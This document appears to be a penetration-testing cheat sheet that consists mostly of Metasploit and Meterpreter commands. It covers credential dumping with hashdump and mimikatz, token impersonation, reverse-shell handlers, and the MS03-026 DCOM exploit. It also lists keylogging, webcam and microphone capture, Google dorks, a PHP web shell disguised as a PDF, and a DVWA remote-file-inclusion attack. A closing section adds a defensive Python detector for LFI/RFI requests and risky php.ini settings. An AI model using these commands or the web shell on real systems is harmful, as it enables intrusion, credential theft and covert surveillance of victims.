[+] Meterpreter Shell
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getsystem
meterpreter > hashdump
meterpreter > load/use mimikatz
kerberos          Attempt to retrieve kerberos creds
livessp           Attempt to retrieve livessp creds
mimikatz_command  Run a custom command
msv               Attempt to retrieve msv creds (hashes)
ssp               Attempt to retrieve ssp creds
tspkg             Attempt to retrieve tspkg creds
wdigest           Attempt to retrieve wdigest creds
meterpreter > wdigest
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token SERV-2K3\Administrator
meterpreter > execute -f cmd.exe -i -t
Metasploit Exploit Multi Handler
multi/handler to accept an incoming reverse_https meterpreter payload:

```
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/
```
Building Your Own MSF Module
```
mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp /usr/share/metasploit-framework/modules/exploits/linux/misc/gld_postfix.rb ./crossfire.rb
nano crossfire.rb
```
Post Exploitation with Metasploit - (available options depend on OS and Meterpreter capabilities)
`download` Download a file or directory
`upload` Upload a file or directory
`portfwd` Forward a local port to a remote service
`route` View and modify the routing table
`keyscan_start` Start capturing keystrokes
`keyscan_stop` Stop capturing keystrokes
`screenshot` Grab a screenshot of the interactive desktop
`record_mic` Record audio from the default microphone for X seconds
`webcam_snap` Take a snapshot from the specified webcam
`getsystem` Attempt to elevate your privilege to that of local system.
`hashdump` Dumps the contents of the SAM database
msf > search dcom
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf > set RHOST 10.0.0.3
msf > show payloads
msf > set PAYLOAD generic/shell_reverse_tcp
msf > set LHOST 10.0.0.6
msf > exploit
msf > sessions -i 1
C:\>dir
wc lfi.pdf
4 4 42 lfi.pdf
cat lfi.pdf
%PDF-1.4
<?php
system($_GET["cmd"]);
?>
msfnginx
sitemap.xml filetype:xml intext:"cgi-bin" filetype:sh inurl:cgi-bin filetype:sh intext:cgi-bin intitle:apache "cgi-bin" inurl:cgi-bin inurl:wspd_cgi.sh inurl:wslb.sh inurl:"server-status" intitle:apache "cgi-bin" inurl:cgi-bin "GATEWAY_INTERFACE = CGI" inurl:cgi-bin inurl:printenv intext:SERVER_ADDR
http://172.16.1.102/dvwa/vulnerabilities/fi/?page=http://172.16.1.100/test.php
exploit/linux/http/nginx_chunked_size
auxiliary/scanner/http/wordpress_ghost_scanner
sudo nano /etc/php5/cgi/php.ini
Make sure allow_url_fopen and allow_url_include are both set to On. Press Ctrl-X, Y, and Enter to save.
sudo /etc/init.d/apache2 restart
nano /var/www/html/test.php
service apache2 restart
msf exploit(unix/webapp/php_include) > set rhost 172.16.1.102
msf exploit(unix/webapp/php_include) > set headers "Cookie:security=low; PHPSESSID=4c0c7c70dfafab05e7d04c88c8966aee"
headers => Cookie:security=low; PHPSESSID=4c0c7c70dfafab05e7d04c88c8966aee
msf exploit(unix/webapp/php_include) > set path /dvwa/vulnerabilities/fi/
msf exploit(unix/webapp/php_include) > set phpuri /?page=XXpathXX
msf exploit(unix/webapp/php_include) > set payload php/bind_php
msf exploit(unix/webapp/php_include) > run
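From the defender's side, the php_include run above leaves two artifacts: the php.ini directives that had to be switched On, and a request whose `page` parameter carries a URL or a traversal sequence. The following script is an added example (not part of these notes or of Metasploit) that flags both; the access-log lines are constructed, and the extra parameter names beyond `page` are an assumption about common PHP apps.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters apps typically pass straight into include(); "page" is DVWA's,
# the rest are common names (assumption).
INCLUDE_PARAMS = {"page", "file", "include", "path", "template"}

# Constructed Apache combined-format lines; hosts and timestamps are made up.
SAMPLE_LOG = """\
172.16.1.100 - - [10/Oct/2023:13:55:36 +0000] "GET /dvwa/vulnerabilities/fi/?page=http://172.16.1.100/test.php HTTP/1.1" 200 512
172.16.1.100 - - [10/Oct/2023:13:55:40 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 1024
172.16.1.100 - - [10/Oct/2023:13:55:44 +0000] "GET /dvwa/vulnerabilities/fi/?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048
172.16.1.100 - - [10/Oct/2023:13:55:50 +0000] "GET /index.php?page=about HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify_include_value(value):
    """Return 'rfi', 'lfi' or None for one include-parameter value."""
    v = unquote(unquote(value)).lower()            # undo single and double URL-encoding
    if re.match(r"^[a-z][a-z0-9+.-]*://", v) or v.startswith("//"):
        return "rfi"                               # http://, ftp://, php://, data:// ...
    if "../" in v or "..\\" in v or v.startswith("/") or "\x00" in v:
        return "lfi"                               # traversal, absolute path, null byte
    return None

def scan_log(text):
    """One finding per request whose include parameter looks like LFI/RFI."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
            kind = classify_include_value(value)
            if name.lower() in INCLUDE_PARAMS and kind:
                findings.append({"ip": m["ip"], "param": name, "value": value,
                                 "kind": kind, "status": int(m["status"])})
    return findings

def risky_php_ini(ini_text):
    """Names of php.ini directives that enable remote inclusion when set On."""
    risky = []
    for line in ini_text.splitlines():
        m = re.match(r"^\s*(allow_url_include|allow_url_fopen)\s*=\s*(\S+)", line, re.I)
        if m and m.group(2).strip('"').lower() in ("on", "1", "true"):
            risky.append(m.group(1).lower())
    return risky

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
    print(risky_php_ini("allow_url_fopen = On\nallow_url_include = On\n"))
```

A 200 status on an `rfi` finding is the case worth paging on: the server fetched and executed the remote file rather than failing to open it.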